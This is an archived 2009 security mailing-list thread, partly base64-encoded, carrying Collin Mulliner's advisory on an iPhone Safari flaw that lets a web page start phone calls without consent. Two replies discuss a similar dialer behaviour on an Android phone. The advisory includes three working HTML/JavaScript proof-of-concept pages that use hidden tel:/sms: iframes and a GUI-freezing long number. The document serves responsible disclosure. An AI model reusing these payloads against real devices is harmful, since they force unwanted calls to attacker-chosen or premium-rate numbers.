cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
